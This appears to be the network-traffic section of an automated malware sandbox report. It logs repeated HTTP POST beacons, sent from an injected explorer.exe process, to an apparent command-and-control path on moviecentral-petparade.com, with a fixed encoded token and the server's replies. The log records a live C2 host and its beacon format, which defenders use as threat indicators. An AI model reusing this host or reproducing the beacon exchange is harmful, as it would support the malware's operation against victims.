                                                                                                                                                                                                                      CF-RAY: 8db3f9191c624642-DFW
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1800&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=319&delivery_rate=0&cwnd=195&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a
                                                                                                                                                                                                                      Data Ascii: 7 <c><d>
                                                                                                                                                                                                                      Oct 31, 2024 14:25:47.403369904 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      6192.168.2.949987172.67.213.17380316C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Oct 31, 2024 14:25:49.037106991 CET169OUTPOST /g9jvjfd73/index.php HTTP/1.1
                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                      Host: moviecentral-petparade.com
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                      Oct 31, 2024 14:25:49.964687109 CET780INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:25:49 GMT
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dgKzCUCZPyqJFPowvreaUR1VO20DkzlSupkG3uoSD0XzCQlZCKASKIBuS6A1mODItBqDiGrTpT%2BaHCrWFx6LnqkSHGp7mel%2B6SeRUFcLl5P5WWwR9ZR74x%2FW3ZvfE0B%2FGf9lfUvPlJQ7sN5ulA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      CF-RAY: 8db3f92908cf2e1b-DFW
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1318&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=169&delivery_rate=0&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      7192.168.2.949988172.67.213.17380316C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Oct 31, 2024 14:25:51.621587038 CET319OUTPOST /g9jvjfd73/index.php HTTP/1.1
                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                      Host: moviecentral-petparade.com
                                                                                                                                                                                                                      Content-Length: 152
                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                      Data Raw: 72 3d 42 39 33 41 39 39 36 30 31 32 41 43 34 33 43 45 46 39 37 45 31 44 43 45 31 34 43 38 36 36 38 33 34 38 44 33 34 34 30 38 39 33 32 36 37 30 41 37 36 36 35 46 43 43 34 31 41 38 31 33 43 37 44 35 38 43 34 38 43 46 38 42 32 39 35 32 37 38 46 37 45 42 43 42 30 37 35 41 39 36 33 34 46 35 44 45 43 37 31 44 35 32 37 35 46 45 41 37 35 39 37 31 36 32 35 37 39 41 44 46 42 42 31 46 37 31 41 44 41 41 43 33 31 33 44 41 37 35 34 43 35 30 42 46 37 30 42 38 35 42
                                                                                                                                                                                                                      Data Ascii: r=B93A996012AC43CEF97E1DCE14C8668348D34408932670A7665FCC41A813C7D58C48CF8B295278F7EBCB075A9634F5DEC71D5275FEA7597162579ADFBB1F71ADAAC313DA754C50BF70B85B
                                                                                                                                                                                                                      Oct 31, 2024 14:25:52.485980034 CET790INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:25:52 GMT
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5ZLb3u3jH7%2FIqYUWo1nq%2B%2BU3TVLgh8BHlvE3VUXjwYYuszknKradrAnyAR%2Bo95vG9vbU0QmmXUGLqTMEIh55K7FRF7%2FhZnAUjXFacpNQwWEex0OJ1l9OZcC20YOlhx4A%2BNnct0qnoOvD1DTlOQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      CF-RAY: 8db3f9390ba24618-DFW
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1315&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=319&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      8192.168.2.949989172.67.213.17380316C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Oct 31, 2024 14:25:54.164885044 CET169OUTPOST /g9jvjfd73/index.php HTTP/1.1
                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                      Host: moviecentral-petparade.com
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                      Oct 31, 2024 14:25:55.004777908 CET780INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:25:54 GMT
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Rx1C0W0Ok3SEPXGgnNG7igz7LRuAYSSVNra6707VGZLx%2B%2BqnSVhJA1dvBDTlNWJ3j3dDzV8IdMItw8GL0oKR5%2FiIPRReEOA4vkw1PC9Zpfo5s%2FbYnYFMePj1G6AGFEFxbJKcvaTPMSMxdgQpUQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      CF-RAY: 8db3f948db62e7c7-DFW
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1155&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=169&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      9192.168.2.949991172.67.213.17380316C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Oct 31, 2024 14:25:56.520003080 CET319OUTPOST /g9jvjfd73/index.php HTTP/1.1
                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                      Host: moviecentral-petparade.com
                                                                                                                                                                                                                      Content-Length: 152
                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                      Data Raw: 72 3d 42 39 33 41 39 39 36 30 31 32 41 43 34 33 43 45 46 39 37 45 31 44 43 45 31 34 43 38 36 36 38 33 34 38 44 33 34 34 30 38 39 33 32 36 37 30 41 37 36 36 35 46 43 43 34 31 41 38 31 33 43 37 44 35 38 43 34 38 43 46 38 42 32 39 35 32 37 38 46 37 45 42 43 42 30 37 35 41 39 36 33 34 46 35 44 45 43 37 31 44 35 32 37 35 46 45 41 37 35 39 37 31 36 32 35 37 39 41 44 46 42 42 31 46 37 31 41 44 41 41 43 33 31 33 44 41 37 35 34 43 35 30 42 46 37 30 42 38 35 42
                                                                                                                                                                                                                      Data Ascii: r=B93A996012AC43CEF97E1DCE14C8668348D34408932670A7665FCC41A813C7D58C48CF8B295278F7EBCB075A9634F5DEC71D5275FEA7597162579ADFBB1F71ADAAC313DA754C50BF70B85B
                                                                                                                                                                                                                      Oct 31, 2024 14:25:57.394423962 CET790INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:25:57 GMT
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SRWMsP2c7CjRZX4f105Rbn8R5%2FXJ0ZeAFeALWF9z79z7VequDMeM6vNcX6nTMazFOVYjC%2B7KTXQvw%2FzRR%2BL6qbmAkMh9rkzix8u%2BQYxvtWnf6Cnc4WnOfjsZGsgYRVCWOpCju%2FoV5RhJF5W9rw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      CF-RAY: 8db3f9579ef0a922-DFW
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2145&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=319&delivery_rate=0&cwnd=183&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      10192.168.2.949992172.67.213.17380316C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Oct 31, 2024 14:25:59.022228003 CET169OUTPOST /g9jvjfd73/index.php HTTP/1.1
                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                      Host: moviecentral-petparade.com
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                      Oct 31, 2024 14:25:59.922946930 CET792INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:25:59 GMT
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q5lU51z%2BHSQb44k6iWKEjSC7%2B9mXVhIT0hJ2OXUZ7%2Bay0kI1gPJKdS%2FSbeXQHnMrsJea%2Bgo8l1sqXHSeFsehbHnpZ46RVS2Jb3x%2FC0XWdAWw3iWgAtnu%2F4pHAf%2B%2Badl%2FyU35UUlkXSMfkWOIDQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      CF-RAY: 8db3f9674d456c08-DFW
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1176&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=169&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      11192.168.2.949993172.67.213.17380316C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Oct 31, 2024 14:26:01.442446947 CET319OUTPOST /g9jvjfd73/index.php HTTP/1.1
                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                      Host: moviecentral-petparade.com
                                                                                                                                                                                                                      Content-Length: 152
                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                      Data Raw: 72 3d 42 39 33 41 39 39 36 30 31 32 41 43 34 33 43 45 46 39 37 45 31 44 43 45 31 34 43 38 36 36 38 33 34 38 44 33 34 34 30 38 39 33 32 36 37 30 41 37 36 36 35 46 43 43 34 31 41 38 31 33 43 37 44 35 38 43 34 38 43 46 38 42 32 39 35 32 37 38 46 37 45 42 43 42 30 37 35 41 39 36 33 34 46 35 44 45 43 37 31 44 35 32 37 35 46 45 41 37 35 39 37 31 36 32 35 37 39 41 44 46 42 42 31 46 37 31 41 44 41 41 43 33 31 33 44 41 37 35 34 43 35 30 42 46 37 30 42 38 35 42
                                                                                                                                                                                                                      Data Ascii: r=B93A996012AC43CEF97E1DCE14C8668348D34408932670A7665FCC41A813C7D58C48CF8B295278F7EBCB075A9634F5DEC71D5275FEA7597162579ADFBB1F71ADAAC313DA754C50BF70B85B
                                                                                                                                                                                                                      Oct 31, 2024 14:26:02.314182997 CET786INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:26:02 GMT
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BJOGU14vWgL5HuP6obsT88IOzRnz3BtTsV1nVrqtFtuIk5dweGhhqZuudDcGxzEjLBu95Jh1UB%2BKHiEvRfqY1Frso30FhzLrjAneb%2FzxDQO%2FLZtE4iaSnEEbM7w0NZAk8X4CZ6A6KV9%2FsFhaLw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      CF-RAY: 8db3f9765c5dddab-DFW
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1396&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=319&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      12192.168.2.949994172.67.213.17380316C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Oct 31, 2024 14:26:03.954372883 CET169OUTPOST /g9jvjfd73/index.php HTTP/1.1
                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                      Host: moviecentral-petparade.com
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                      Oct 31, 2024 14:26:04.816848993 CET776INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:26:04 GMT
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RDccIHLsr4NC1IYcnP5HLU0dYQ5cR20OhlArQ8g4V4kGIWNfhnIOBEzXns9m33rA2tVgO7NnkCL5q8G%2B8TKirAhnEt80bEUGd1pZm0tXXqWwFpHJcv6EA0t22pVPB6egrbjXTUgs%2BdtHo5x0WA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      CF-RAY: 8db3f9860ed86b83-DFW
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1021&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=169&delivery_rate=0&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      13192.168.2.949995172.67.213.17380316C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Oct 31, 2024 14:26:06.333141088 CET319OUTPOST /g9jvjfd73/index.php HTTP/1.1
                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                      Host: moviecentral-petparade.com
                                                                                                                                                                                                                      Content-Length: 152
                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                      Data Raw: 72 3d 42 39 33 41 39 39 36 30 31 32 41 43 34 33 43 45 46 39 37 45 31 44 43 45 31 34 43 38 36 36 38 33 34 38 44 33 34 34 30 38 39 33 32 36 37 30 41 37 36 36 35 46 43 43 34 31 41 38 31 33 43 37 44 35 38 43 34 38 43 46 38 42 32 39 35 32 37 38 46 37 45 42 43 42 30 37 35 41 39 36 33 34 46 35 44 45 43 37 31 44 35 32 37 35 46 45 41 37 35 39 37 31 36 32 35 37 39 41 44 46 42 42 31 46 37 31 41 44 41 41 43 33 31 33 44 41 37 35 34 43 35 30 42 46 37 30 42 38 35 42
                                                                                                                                                                                                                      Data Ascii: r=B93A996012AC43CEF97E1DCE14C8668348D34408932670A7665FCC41A813C7D58C48CF8B295278F7EBCB075A9634F5DEC71D5275FEA7597162579ADFBB1F71ADAAC313DA754C50BF70B85B
                                                                                                                                                                                                                      Oct 31, 2024 14:26:07.225070000 CET786INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:26:07 GMT
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8GV2wBKfQujIJKyQqvXBXeAg3%2FjgppUA4ygzKu8kL%2B85EuprlxVgCqX%2BebtSCw0p5WzMf7dQYqALogkOQf6CY9sJHuQvduYCTXQ4QFQW2P%2B5XICgk6gsVhk3bwUcxEE8O8hhuiYoms2kXOS8hA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      CF-RAY: 8db3f994ebe9e942-DFW
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1374&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=319&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      14192.168.2.949996172.67.213.17380316C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Oct 31, 2024 14:26:08.850112915 CET169OUTPOST /g9jvjfd73/index.php HTTP/1.1
                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                      Host: moviecentral-petparade.com
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                      Oct 31, 2024 14:26:09.717773914 CET790INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:26:09 GMT
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CV8LoPUh48M%2Bm72PAAVpE46Xb6Cn278jQ%2BfMTL7ORYvlujHqsR7ZPY3NXwbj%2F3OuPC%2B9doOVmsSqlb7y8%2FtyEwznNV04NsJLCnIiReqyO4%2FGXunHzp%2FNnYS7k%2FOL%2FLA8ir7pgF5H3m9WoQ227g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      CF-RAY: 8db3f9a4a8a46b97-DFW
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1080&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=169&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      15192.168.2.949997172.67.213.17380316C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Oct 31, 2024 14:26:11.239394903 CET319OUTPOST /g9jvjfd73/index.php HTTP/1.1
                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                      Host: moviecentral-petparade.com
                                                                                                                                                                                                                      Content-Length: 152
                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                      Data Raw: 72 3d 42 39 33 41 39 39 36 30 31 32 41 43 34 33 43 45 46 39 37 45 31 44 43 45 31 34 43 38 36 36 38 33 34 38 44 33 34 34 30 38 39 33 32 36 37 30 41 37 36 36 35 46 43 43 34 31 41 38 31 33 43 37 44 35 38 43 34 38 43 46 38 42 32 39 35 32 37 38 46 37 45 42 43 42 30 37 35 41 39 36 33 34 46 35 44 45 43 37 31 44 35 32 37 35 46 45 41 37 35 39 37 31 36 32 35 37 39 41 44 46 42 42 31 46 37 31 41 44 41 41 43 33 31 33 44 41 37 35 34 43 35 30 42 46 37 30 42 38 35 42
                                                                                                                                                                                                                      Data Ascii: r=B93A996012AC43CEF97E1DCE14C8668348D34408932670A7665FCC41A813C7D58C48CF8B295278F7EBCB075A9634F5DEC71D5275FEA7597162579ADFBB1F71ADAAC313DA754C50BF70B85B
                                                                                                                                                                                                                      Oct 31, 2024 14:26:12.105653048 CET785INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:26:12 GMT
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u5p3j%2Bzl%2FtrecYLlpvhE0nq05AdBOPDEUMmYMCpSUQ2KDhmCUx%2Bt3Wwb6%2BbtOmCBIinzGYKz9nfMuTzq8zJYKTyZOm14tacMYsFnI5fr6BsinRrGvkoZiBxl23SayZipyE7yu8kwbfYRxKFokg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      CF-RAY: 8db3f9b38dd7ddb3-DFW
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1202&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=319&delivery_rate=0&cwnd=71&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      16192.168.2.949998172.67.213.17380316C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Oct 31, 2024 14:26:13.739603043 CET169OUTPOST /g9jvjfd73/index.php HTTP/1.1
                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                      Host: moviecentral-petparade.com
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                      Oct 31, 2024 14:26:14.590442896 CET784INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:26:14 GMT
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ro1uHPR1Xwo1XTvkuomD2d4XSoI4AVQfgfA%2BCSFrBXvRCTAFMpUBBAy0akw1XFV%2FW%2FVgAMg9D5AZJucy28fq9wA2%2FFV7XxONypT0IAzzbi%2BYZQVOSRMLrVShGUBsK0aj%2B4cbC8M5xJE6hPLQ5g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      CF-RAY: 8db3f9c32f0fddad-DFW
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1396&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=169&delivery_rate=0&cwnd=173&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: 1 0


